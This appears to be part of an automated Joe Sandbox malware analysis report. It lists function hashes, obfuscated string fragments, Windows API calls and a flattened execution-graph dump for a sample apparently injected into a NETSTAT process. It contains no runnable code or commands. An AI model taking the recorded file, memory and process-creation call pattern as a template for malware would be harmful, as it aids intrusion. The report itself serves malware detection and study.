                                                      • Opcode ID: 10f700fedfa9f69d85bc77bfcaa90d4e8fcd5df2d8ad92ecdeca81baca7197c9
                                                      • Instruction ID: b75a58e330f650de5bef39b4e24623c1a02ebf0daf3fce27ca7a92e2c576066e
                                                      • Opcode Fuzzy Hash: 10f700fedfa9f69d85bc77bfcaa90d4e8fcd5df2d8ad92ecdeca81baca7197c9
                                                      • Instruction Fuzzy Hash: 27E02632B0021133E220158AAD05F9F73ADCBC4EA0F240039FF0C9B300E671A80143E0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8d04417c9546e40d6cfd720a498624c6c26dd99e735d87f81839b1fd37759cf6
                                                      • Instruction ID: cdb89d08813ef942cf09051712d6ffa6908be141b1e25427d23e5da4654ce18b
                                                      • Opcode Fuzzy Hash: 8d04417c9546e40d6cfd720a498624c6c26dd99e735d87f81839b1fd37759cf6
                                                      • Instruction Fuzzy Hash: A8E09271A15009EBDB08CFA4E941BEDBBA5EF04351F1083AEE919DB280D635DB948B40
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction ID: 5102deb7f88cf714516af9cd59d560887c9765688f0b2db5f74b9a101a1bf530
                                                      • Opcode Fuzzy Hash: 4d70b07d015640436ff79a030af5fda1140dbc98913e55b2ed826efc0772edf8
                                                      • Instruction Fuzzy Hash: EFE046762002047BDA20EA5ADC41F9B776DDBC9754F10485AFA0CA7241C770BA418AF0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Offset: 02D40000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_2d40000_mCFHCvdrqdDiDT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                      • API String ID: 0-3248090998
                                                      • Opcode ID: 4241983487a0923d64a08762c4611a23f430bfe5466dcb225cb066758c1d3509
                                                      • Instruction ID: a17024c8fa3abbe4e827f05c35ec160822085ca06c2c6e7cecdce889f44299d3
                                                      • Opcode Fuzzy Hash: 4241983487a0923d64a08762c4611a23f430bfe5466dcb225cb066758c1d3509
                                                      • Instruction Fuzzy Hash: BE91FFF08052998ACB118F55A5603DFBF71BB95304F1581E9C6AA7B243C3BE4E86DF50
                                                      Strings
                                                      • String ID: J$ p$%'$($*$$*]$,G$,X$4T$:k$<$=$A$I4$In$J$JB$Ma$OC$Q}$Rr$Tl$U$VP$\$_:$_O$d$eL$f$m$n$pH$pw$rp$s$z`$~$9$f
                                                      • API String ID: 0-2424688085
                                                      • Opcode ID: 0241f576a3a8a69ceee388cafa85eee01302085c3cc7f0d5b1f62c543013b7cc
                                                      • Instruction ID: af527723812f66d9e07bf3db7cd04c84568a1533beacfabb9d52a8dd7ffb2511
                                                      • Opcode Fuzzy Hash: 0241f576a3a8a69ceee388cafa85eee01302085c3cc7f0d5b1f62c543013b7cc
                                                      • Instruction Fuzzy Hash: 6FC105B0D06669CAEB618F41C9987DEBAB1BB05308F5081C9C55C3B281C7BA1A89CF95
                                                      Strings
                                                      • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                      • API String ID: 0-1002149817
                                                      • Opcode ID: 25901e7c20f7354abc7d655ea1c977976a1770678b879a7dffbd48516f1992df
                                                      • Instruction ID: e2de10c607bb028ec614b50a23aee65f9ffb27add81aacfeab28d274bbae7233
                                                      • Opcode Fuzzy Hash: 25901e7c20f7354abc7d655ea1c977976a1770678b879a7dffbd48516f1992df
                                                      • Instruction Fuzzy Hash: FFC14EB1D0022CAADB20DFA5DD44BEEBBB9AF05344F1081DDD60CA7241E7B55A88CF95
                                                      Strings
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: 9b543ba098722968b5fa1639369ed1244405b457899f8b5c70d6db776eecd3b5
                                                      • Instruction ID: 10b7886f0037596362e1d541daa26d40fe9de60906f7906fd9f0800055e6b15e
                                                      • Opcode Fuzzy Hash: 9b543ba098722968b5fa1639369ed1244405b457899f8b5c70d6db776eecd3b5
                                                      • Instruction Fuzzy Hash: 43716FB1C10618ABDB15DFE4CD40FEEB77DAF44745F0441ADE609AA240EB745B888FA1
                                                      Strings
                                                      • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                      • API String ID: 0-392141074
                                                      • Opcode ID: efbdb510190de87333c81ba02f0d420c3503882c7cae8e567bfc1aa38bdb48df
                                                      • Instruction ID: 27774e7203e8ce6e288bb034aebfcf28fb3f5f943b6cd9442cda32299b1c43c6
                                                      • Opcode Fuzzy Hash: efbdb510190de87333c81ba02f0d420c3503882c7cae8e567bfc1aa38bdb48df
                                                      • Instruction Fuzzy Hash: 966160B1C10618AADB15DFE4CD40FEEB77DAF44745F1041ADE609A6240EB74578C8F61
                                                      Strings
                                                      • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                      • API String ID: 0-685823316
                                                      • Opcode ID: e04f8f2106aba0a9f6bbd9fe1db370d7d8aba9ddc80bba90d2a42d99d20a0962
                                                      • Instruction ID: a5195a8b24b2d77620d66204074502290ee8f19dbdf21dfca638796d29216ae0
                                                      • Opcode Fuzzy Hash: e04f8f2106aba0a9f6bbd9fe1db370d7d8aba9ddc80bba90d2a42d99d20a0962
                                                      • Instruction Fuzzy Hash: 8C31B1B1D41218BAEF50DFE4DC84FEEBBB9AF04744F14815DE608BA180DBB516488FA4
                                                      Strings
                                                      • String ID: .$P$e$i$m$o$r$x
                                                      • API String ID: 0-620024284
                                                      • Opcode ID: 77300220f4a13f27e41ad65499c80c3e88828382581353aa69728ffb3e0a7a06
                                                      • Instruction ID: a8fad443568847d7053846fbca58108c24b4e1491de878fc5429733cc5c138b7
                                                      • Opcode Fuzzy Hash: 77300220f4a13f27e41ad65499c80c3e88828382581353aa69728ffb3e0a7a06
                                                      • Instruction Fuzzy Hash: 6241A5B1C00218B6EB21EFA4DD40FEE737DAF54740F1085ADA60DA7140EBB597898FA1
                                                      Strings
                                                      • String ID: L$S$\$a$c$e$l
                                                      • API String ID: 0-3322591375
                                                      • Opcode ID: 682fa9bbc6c9f6298211bf408d59e28f48b363cf0cee26abce7a0ef0de4fc895
                                                      • Instruction ID: fe50dc89c649daa3234cf2c24aece9ecc4683e2c1fefe1f3205ec18aaeb5d8c2
                                                      • Opcode Fuzzy Hash: 682fa9bbc6c9f6298211bf408d59e28f48b363cf0cee26abce7a0ef0de4fc895
                                                      • Instruction Fuzzy Hash: DB4194B2C00619AECB10DFA8DC84BEEB7F9EF88750F11816EDA09A7100E7715A458F94
                                                      Strings
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: d775bf1574670593f6cedc95f5e8738c703a8f6cc7e18ced4ba738e3d82837c1
                                                      • Instruction ID: e58f023124e9728db7c449b32b85c6f4ea26ec935022f9fc0ca5b1e15a99e35f
                                                      • Opcode Fuzzy Hash: d775bf1574670593f6cedc95f5e8738c703a8f6cc7e18ced4ba738e3d82837c1
                                                      • Instruction Fuzzy Hash: 06615EB1D00308AFDB25DBE5CC80FEFB7B9AF88754F108559E619A7240D734AA41CBA0
                                                      Strings
                                                      • String ID: $i$l$o$u
                                                      • API String ID: 0-2051669658
                                                      • Opcode ID: 87cfcc0d2aa8f5e09a6d974384a6056b7e59a16390a0453b67de1c0d4eb11dc4
                                                      • Instruction ID: f7a997dd57251d52bc93a6a3ec2f62a13c8053c920b3ad48ce3a77c226880e92
                                                      • Opcode Fuzzy Hash: 87cfcc0d2aa8f5e09a6d974384a6056b7e59a16390a0453b67de1c0d4eb11dc4
                                                      • Instruction Fuzzy Hash: B2410AB1900708AFDB21DFE5CC84FEFBBB9AF88744F104559E619A7240D770AA458BA0
                                                      Strings
                                                      • String ID: !$&$X$_$i
                                                      • API String ID: 0-3149547728
                                                      • Opcode ID: ea27a71d1baf22dfba401bbd8d9eb3609e2fad2e813c8d3c0a779191a4e16633
                                                      • Instruction ID: e54578d36e1907ac1dd3741d38741dfa5f646acbb827340f0b9ddb8e3356b536
                                                      • Opcode Fuzzy Hash: ea27a71d1baf22dfba401bbd8d9eb3609e2fad2e813c8d3c0a779191a4e16633
                                                      • Instruction Fuzzy Hash: 1311DB20D087CAD9DB12C7BC84086AEBF711F23224F0883D9D5F16B3D6D2B54206C7A2
                                                      Strings
                                                      • String ID: -g+&$-g+&8/$8/$E:sx$sx;C
                                                      • API String ID: 0-930871490
                                                      • Opcode ID: 1fc91170322eff9f16a743ec565b38b131aec4198e82332303ae8dd2043c3390
                                                      • Instruction ID: 5694c8ae42a41c3affa70f426475e924c1e7973f9629d3e550dfd1df2414dfc7
                                                      • Opcode Fuzzy Hash: 1fc91170322eff9f16a743ec565b38b131aec4198e82332303ae8dd2043c3390
                                                      • Instruction Fuzzy Hash: F2E0D8B0D1035C6ACB04EFE8DC426EEBB35EF41340F60499CD955DB242E7B08A04CB86
                                                      Strings
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: be9493dddeaf5967cfd1d226c3bf24f26eeb4e073a1cf0ac4d5506df550b66a5
                                                      • Instruction ID: 5f1dca20dcb9678faf42caccbc5cf2f1ac3dcb4e052c05578e3fe5240558f827
                                                      • Opcode Fuzzy Hash: be9493dddeaf5967cfd1d226c3bf24f26eeb4e073a1cf0ac4d5506df550b66a5
                                                      • Instruction Fuzzy Hash: F9B14CB5A00308AFDB25DBA9CC80FEFB7B9AF88744F108559F619A7240D775AA01CB50
                                                      Strings
                                                      • String ID: $e$h$o
                                                      • API String ID: 0-3662636641
                                                      • Opcode ID: 3422d03d3311d62adec16181f81e1dc0e4e7de10eab4c6b891c0d97be83181f6
                                                      • Instruction ID: d78877adaec44a2c9d8f4cea42fdd670ad52f789cd2e53658180ab018b2eeaa5
                                                      • Opcode Fuzzy Hash: 3422d03d3311d62adec16181f81e1dc0e4e7de10eab4c6b891c0d97be83181f6
                                                      • Instruction Fuzzy Hash: DD8173B6900218AADB65DB94CC80FEF737DEF88740F00419DE749A6145EF705B898FA1
                                                      Strings
                                                      • String ID: $e$k$o
                                                      • API String ID: 0-3624523832
                                                      • Opcode ID: 5ba035e0985e054600bac94e5c2b3b1d672d4c1e752e2c3d5853afa101767467
                                                      • Instruction ID: 058bd856f95d7113adee042705c0a9b7530ef41deb97562fb692efb38dce9f9e
                                                      • Opcode Fuzzy Hash: 5ba035e0985e054600bac94e5c2b3b1d672d4c1e752e2c3d5853afa101767467
                                                      • Instruction Fuzzy Hash: B2614AB5A00308AFDB25DFA5CC84FEFB7BDAF88704F108559E619A7244D771AA41CB60
                                                      Strings
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 91c418c8159298c687abc08d686a23a13c307923b2a5f9b472b9666d9ae818b2
                                                      • Instruction ID: 59791a0b9b3c0265db047d631201ae74fb1dc603045076b72f573742e2983d69
                                                      • Opcode Fuzzy Hash: 91c418c8159298c687abc08d686a23a13c307923b2a5f9b472b9666d9ae818b2
                                                      • Instruction Fuzzy Hash: FD416D71A11119BAEB01EB90CD42FEF777DAF55B40F104059FB00AB180E7B56A068BF6
                                                      Strings
                                                      • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                      • API String ID: 0-2877786613
                                                      • Opcode ID: 5ed0058f9f4c1a1418e57778257814aedc4a0eb7b29c996c5648fb320b9da6cb
                                                      • Instruction ID: 54cc37f07ee2ccdbebb9c725e1ac6364707de494d57e17a0f7f49ddc10c0885c
                                                      • Opcode Fuzzy Hash: 5ed0058f9f4c1a1418e57778257814aedc4a0eb7b29c996c5648fb320b9da6cb
                                                      • Instruction Fuzzy Hash: E3317E71A11119BAEB01EB90CD42FEF777DAF55B40F104059FB00AB180E7B56A028BF6
                                                      Strings
                                                      • String ID: 2$3$4$9
                                                      • API String ID: 0-2062807800
                                                      • Opcode ID: eedecaed4c46782e0038a77bdf983cf57e39231a6cd75073988ad1010defb064
                                                      • Instruction ID: c0a86ef1446406d3ed934bced19086fc683a80a39cd05d30f355c64f46811fcc
                                                      • Opcode Fuzzy Hash: eedecaed4c46782e0038a77bdf983cf57e39231a6cd75073988ad1010defb064
                                                      • Instruction Fuzzy Hash: 1C3171B1D00109ABEB00DFE4DD41BEEB3B9EF44344F104099EA04AB240E7B5AA058BE5
                                                      Strings
                                                      • String ID: 2M9L$4139$41392M9L$41392M9L
                                                      • API String ID: 0-802357084
                                                      • Opcode ID: f2f06f4055ec55d0939464221b968211078e84cc7ace67b5d94740b01fc74d70
                                                      • Instruction ID: f89423dc1695313aff10adeaf9e2f6d41d33af37bae1e92b1c0e10ef82f9acf7
                                                      • Opcode Fuzzy Hash: f2f06f4055ec55d0939464221b968211078e84cc7ace67b5d94740b01fc74d70
                                                      • Instruction Fuzzy Hash: 3001C4B2D4121D7ADB11ABE59C81DEFBB7CEF456D4F048068FB04AB140D6285E068FB2
                                                      Strings
                                                      • String ID: 2M9L$4139$41392M9L$41392M9L
                                                      • API String ID: 0-802357084
                                                      • Opcode ID: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction ID: 37e8468b247d91f95a60eb6a42964dd13ded8c8f56fbee416e00f293e0be1da9
                                                      • Opcode Fuzzy Hash: b5455ddb34965fc3d5f9ad89c7ac4ae6f5a50f54c0de38243e1a5172f6207e5a
                                                      • Instruction Fuzzy Hash: EE01F772E45158778B128A959D819EDBB6CEF41198B04C0E9EF18DB200E7264A069BE2

                                                      Execution Graph

                                                      Execution Coverage:2.5%
                                                      Dynamic/Decrypted Code Coverage:4.1%
                                                      Signature Coverage:2.2%
                                                      Total number of Nodes:460
                                                      Total number of Limit Nodes:71
execution_graph: node/edge dump of the rendered graph omitted here (flattened "<id> <address> [API labels] <a>-><b>" tokens; this copy of the dump was truncated). APIs named on the visible nodes: CreateProcessInternalW, FindClose, FindFirstFileW, FindNextFileW, LdrInitializeThunk, LdrLoadDll, NtAllocateVirtualMemory, NtClose, NtCreateFile, RtlAllocateHeap, RtlFreeHeap, SetErrorMode. Node addresses in the visible dump lie in 0x3044180-0x3934340.
101591->101593 101592 305fb6e 101593->101592 101620 30564f0 101593->101620 101597 305fc0e 101598 305fd22 101597->101598 101629 305f7b0 101597->101629 101599 3069540 NtClose 101598->101599 101601 305fd2c 101599->101601 101602 305fc26 101602->101598 101603 305fc31 101602->101603 101604 306b6a0 RtlAllocateHeap 101603->101604 101605 305fc5a 101604->101605 101606 305fc63 101605->101606 101607 305fc79 101605->101607 101608 3069540 NtClose 101606->101608 101638 305f6a0 CoInitialize 101607->101638 101611 305fc6d 101608->101611 101610 305fc87 101641 3069000 101610->101641 101613 305fd02 101614 3069540 NtClose 101613->101614 101616 305fd0c 101614->101616 101615 305fca5 101615->101613 101619 3069000 LdrInitializeThunk 101615->101619 101617 306b5c0 RtlFreeHeap 101616->101617 101618 305fd13 101617->101618 101619->101615 101621 3056515 101620->101621 101645 3068eb0 101621->101645 101624 3067080 101625 30670e5 101624->101625 101626 3067118 101625->101626 101650 30605b9 RtlFreeHeap 101625->101650 101626->101597 101628 30670fa 101628->101597 101630 305f7cc 101629->101630 101631 3054660 LdrLoadDll 101630->101631 101633 305f7ea 101631->101633 101632 305f7f3 101632->101602 101633->101632 101634 3054660 LdrLoadDll 101633->101634 101635 305f8be 101634->101635 101636 3054660 LdrLoadDll 101635->101636 101637 305f918 101635->101637 101636->101637 101637->101602 101640 305f705 101638->101640 101639 305f79b CoUninitialize 101639->101610 101640->101639 101642 306901a 101641->101642 101651 3932ba0 LdrInitializeThunk 101642->101651 101643 306904a 101643->101615 101646 3068ecd 101645->101646 101649 3932c60 LdrInitializeThunk 101646->101649 101647 3056589 101647->101618 101647->101624 101649->101647 101650->101628 101651->101643 101652 3055cd0 101653 3058260 LdrInitializeThunk 101652->101653 101654 3055d00 101652->101654 101653->101654 101657 30581e0 101654->101657 101656 3055d25 101658 3058224 101657->101658 101659 3058245 101658->101659 101664 3068870 101658->101664 101659->101656 101661 
3058235 101662 3058251 101661->101662 101663 3069540 NtClose 101661->101663 101662->101656 101663->101659 101665 30688ea 101664->101665 101667 306889b 101664->101667 101669 3934650 LdrInitializeThunk 101665->101669 101666 306890f 101666->101661 101667->101661 101669->101666 101670 3061910 101671 306192c 101670->101671 101672 3061954 101671->101672 101673 3061968 101671->101673 101674 3069540 NtClose 101672->101674 101675 3069540 NtClose 101673->101675 101676 306195d 101674->101676 101677 3061971 101675->101677 101680 306b6e0 RtlAllocateHeap 101677->101680 101679 306197c 101680->101679 101681 3068b50 101682 3068b6a 101681->101682 101685 3932df0 LdrInitializeThunk 101682->101685 101683 3068b92 101685->101683 101691 30689d0 101692 3068a5f 101691->101692 101694 30689fe 101691->101694 101696 3932ee0 LdrInitializeThunk 101692->101696 101693 3068a90 101696->101693 101697 3053213 101698 3057ee0 2 API calls 101697->101698 101700 3053223 101698->101700 101699 305323f 101700->101699 101701 3069540 NtClose 101700->101701 101701->101699 101702 3066250 101703 30662aa 101702->101703 101705 30662b7 101703->101705 101706 3063c60 101703->101706 101707 306b530 NtAllocateVirtualMemory 101706->101707 101709 3063ca1 101707->101709 101708 3063dae 101708->101705 101709->101708 101710 3054660 LdrLoadDll 101709->101710 101712 3063ce7 101710->101712 101711 3063d30 Sleep 101711->101712 101712->101708 101712->101711 101713 30602d0 101714 30602ed 101713->101714 101715 3054660 LdrLoadDll 101714->101715 101716 306030b 101715->101716 101717 3067080 RtlFreeHeap 101716->101717 101718 3060495 101716->101718 101717->101718 101720 3049b20 101722 3049b2f 101720->101722 101721 3049b70 101722->101721 101723 3049b5d CreateThread 101722->101723 101724 3050ea0 101725 3050eba 101724->101725 101726 3054660 LdrLoadDll 101725->101726 101727 3050ed8 101726->101727 101728 3050f0c PostThreadMessageW 101727->101728 101729 3050f1d 101727->101729 101728->101729 101730 30572a0 101731 30572bc 101730->101731 101735 
305730f 101730->101735 101732 3069540 NtClose 101731->101732 101731->101735 101734 30572d7 101732->101734 101733 3057447 101740 3056670 NtClose LdrInitializeThunk LdrInitializeThunk 101734->101740 101735->101733 101741 3056670 NtClose LdrInitializeThunk LdrInitializeThunk 101735->101741 101737 3057421 101737->101733 101742 3056840 NtClose LdrInitializeThunk LdrInitializeThunk 101737->101742 101740->101735 101741->101737 101742->101733 101743 305aee0 101748 305abd0 101743->101748 101745 305aeed 101762 305a840 101745->101762 101747 305af09 101749 305abf5 101748->101749 101773 30584d0 101749->101773 101752 305ad46 101752->101745 101754 305ad5d 101754->101745 101755 305ad54 101755->101754 101757 305ae58 101755->101757 101792 305a290 101755->101792 101759 305aebd 101757->101759 101801 305a600 101757->101801 101760 306b5c0 RtlFreeHeap 101759->101760 101761 305aec4 101760->101761 101761->101745 101763 305a856 101762->101763 101766 305a861 101762->101766 101764 306b6a0 RtlAllocateHeap 101763->101764 101764->101766 101765 305a888 101765->101747 101766->101765 101767 30584d0 GetFileAttributesW 101766->101767 101768 305aba2 101766->101768 101771 305a290 RtlFreeHeap 101766->101771 101772 305a600 RtlFreeHeap 101766->101772 101767->101766 101769 305abbb 101768->101769 101770 306b5c0 RtlFreeHeap 101768->101770 101769->101747 101770->101769 101771->101766 101772->101766 101774 30584f1 101773->101774 101775 3058503 101774->101775 101776 30584f8 GetFileAttributesW 101774->101776 101775->101752 101777 3063540 101775->101777 101776->101775 101778 306354e 101777->101778 101779 3063555 101777->101779 101778->101755 101780 3054660 LdrLoadDll 101779->101780 101781 306358a 101780->101781 101782 3063599 101781->101782 101805 3063000 LdrLoadDll 101781->101805 101783 306b6a0 RtlAllocateHeap 101782->101783 101788 3063744 101782->101788 101785 30635b2 101783->101785 101786 306373a 101785->101786 101785->101788 101789 30635ce 101785->101789 101787 306b5c0 RtlFreeHeap 101786->101787 
101786->101788 101787->101788 101788->101755 101789->101788 101790 306b5c0 RtlFreeHeap 101789->101790 101791 306372e 101790->101791 101791->101755 101793 305a2b6 101792->101793 101806 305dcf0 101793->101806 101795 305a328 101797 305a4b0 101795->101797 101798 305a346 101795->101798 101796 305a495 101796->101755 101797->101796 101799 305a150 RtlFreeHeap 101797->101799 101798->101796 101810 305a150 101798->101810 101799->101797 101802 305a626 101801->101802 101803 305dcf0 RtlFreeHeap 101802->101803 101804 305a6ad 101803->101804 101804->101757 101805->101782 101807 305dd14 101806->101807 101808 306b5c0 RtlFreeHeap 101807->101808 101809 305dd21 101807->101809 101808->101809 101809->101795 101811 305a16d 101810->101811 101814 305dd70 101811->101814 101813 305a273 101813->101798 101815 305dd94 101814->101815 101816 305de3e 101815->101816 101817 306b5c0 RtlFreeHeap 101815->101817 101816->101813 101817->101816 101823 3061ca0 101824 3061cb9 101823->101824 101825 3061d04 101824->101825 101828 3061d47 101824->101828 101830 3061d4c 101824->101830 101826 306b5c0 RtlFreeHeap 101825->101826 101827 3061d14 101826->101827 101829 306b5c0 RtlFreeHeap 101828->101829 101829->101830 101831 30694a0 101832 3069517 101831->101832 101834 30694ce 101831->101834 101833 306952d NtDeleteFile 101832->101833 101837 30523b0 101838 3068ba0 LdrInitializeThunk 101837->101838 101839 30523e6 101838->101839 101842 30695d0 101839->101842 101841 30523fb 101843 306965f 101842->101843 101845 30695fe 101842->101845 101847 3932e80 LdrInitializeThunk 101843->101847 101844 3069690 101844->101841 101845->101841 101847->101844 101848 3056eb0 101849 3056eda 101848->101849 101852 3058090 101849->101852 101851 3056f04 101853 30580ad 101852->101853 101859 3068c90 101853->101859 101855 30580fd 101856 3058104 101855->101856 101857 3068d70 LdrInitializeThunk 101855->101857 101856->101851 101858 305812d 101857->101858 101858->101851 101860 3068cbb 101859->101860 101861 3068d28 101859->101861 101860->101855 101864 3932f30 
LdrInitializeThunk 101861->101864 101862 3068d61 101862->101855 101864->101862 101865 3065b70 101866 3065bd5 101865->101866 101867 3065c0c 101866->101867 101870 3061350 101866->101870 101869 3065bee 101871 306135e 101870->101871 101872 30613de 101871->101872 101884 30693b0 101871->101884 101872->101869 101874 30614f5 101878 3069540 NtClose 101874->101878 101875 30614e0 101877 3069540 NtClose 101875->101877 101876 30614c2 101876->101874 101876->101875 101879 30614e9 101877->101879 101881 30614fe 101878->101881 101879->101869 101880 3061535 101880->101869 101881->101880 101882 306b5c0 RtlFreeHeap 101881->101882 101883 3061529 101882->101883 101883->101869 101885 3069457 101884->101885 101887 30693de 101884->101887 101886 306946d NtReadFile 101885->101886 101886->101876 101887->101876

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: u$G$($-8$0L$4Q$5+$67$:$:k5+$;$=$@9$C--8$J$Q$T$U$Vx$W$Y$^$``$b$pB$w${
                                                      • API String ID: 0-2348033831
                                                      • Opcode ID: a9d9191015d3eacfe7ea2774ad8d165edea2daefa97897544a324c105c975e8a
                                                      • Instruction ID: 074b087d92288b15b83305b9d0f2f0ac2483ab68dd57e6ee0b1b9ce9041357b8
                                                      • Opcode Fuzzy Hash: a9d9191015d3eacfe7ea2774ad8d165edea2daefa97897544a324c105c975e8a
                                                      • Instruction Fuzzy Hash: 7D42D5B0E46228CFEB24CF59C894BDDBBB1BB84308F1085E9D00D6B291D7B95A85CF55
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(?,00000000), ref: 0305C864
                                                      • FindNextFileW.KERNELBASE(?,00000010), ref: 0305C89F
                                                      • FindClose.KERNELBASE(?), ref: 0305C8AA
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstNext
                                                      • String ID:
                                                      • API String ID: 3541575487-0
                                                      • Opcode ID: afebcd096fb5cbe9345ddb507faedf167d37da165dfd3dea86cc339ad10eb741
                                                      • Instruction ID: eaee0cb6ebd6f2fdca477372b3c7fbb0b68872feb22766214ecb6381e295ee9d
                                                      • Opcode Fuzzy Hash: afebcd096fb5cbe9345ddb507faedf167d37da165dfd3dea86cc339ad10eb741
                                                      • Instruction Fuzzy Hash: 443176B59013087BEB64DF60CC85FFF77BCDF84754F144559B908AB180EA74AA848BA0
                                                      APIs
                                                      • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 0306933B
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 96481b07a0cda4c73462c0131a6270748126078e6bfbff863e1c81d70d13cbdc
                                                      • Instruction ID: fb23d6847c84ebd9fa76c89cc265af535808c43f9175e45bc07097ef372015c4
                                                      • Opcode Fuzzy Hash: 96481b07a0cda4c73462c0131a6270748126078e6bfbff863e1c81d70d13cbdc
                                                      • Instruction Fuzzy Hash: 6031C3B5A01248AFDB14DF98D881EEFB7F9EF88310F108219F919A7344D774A951CBA1
                                                      APIs
                                                      • NtReadFile.NTDLL(00000000,?,?,?,?,00000000,00000000,00000000,?), ref: 03069496
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 5d324f2de9b0bdc292b076fbbb4fc14851e6e6c422cf67df24d7c93528720459
                                                      • Instruction ID: 3b728b10f4590274c8f130221882bb544f38a38f8ad163da65c7ebde1604037c
                                                      • Opcode Fuzzy Hash: 5d324f2de9b0bdc292b076fbbb4fc14851e6e6c422cf67df24d7c93528720459
                                                      • Instruction Fuzzy Hash: 3731F8B5A01208AFDB14DF98D880EEF77F9EF8C314F108219F918AB244D674A941CBA1
                                                      APIs
                                                      • NtAllocateVirtualMemory.NTDLL(03051E8E,?,0306818F,00000000,00000004,00003000,?,?,?,?,?,0306818F,03051E8E), ref: 03069765
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateMemoryVirtual
                                                      • String ID:
                                                      • API String ID: 2167126740-0
                                                      • Opcode ID: 2ff54859743f0e75b1bce2d868ce9d863c027bd32c74298cdf015438bdccce6a
                                                      • Instruction ID: 8e869eee6d4980097022eae9e5608ecde912aff860726e84a5b48380862c18c6
                                                      • Opcode Fuzzy Hash: 2ff54859743f0e75b1bce2d868ce9d863c027bd32c74298cdf015438bdccce6a
                                                      • Instruction Fuzzy Hash: 6A2128B5A01708AFDB14DF98DC81EEFB7B9EF88710F108119F918AB244D774A951CBA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Offset: 03040000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_3040000_NETSTAT.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: cf00df1e9b3e13202d80378ec7fa8627bc819169e84eb9ca6fd6a41da5ee3b37
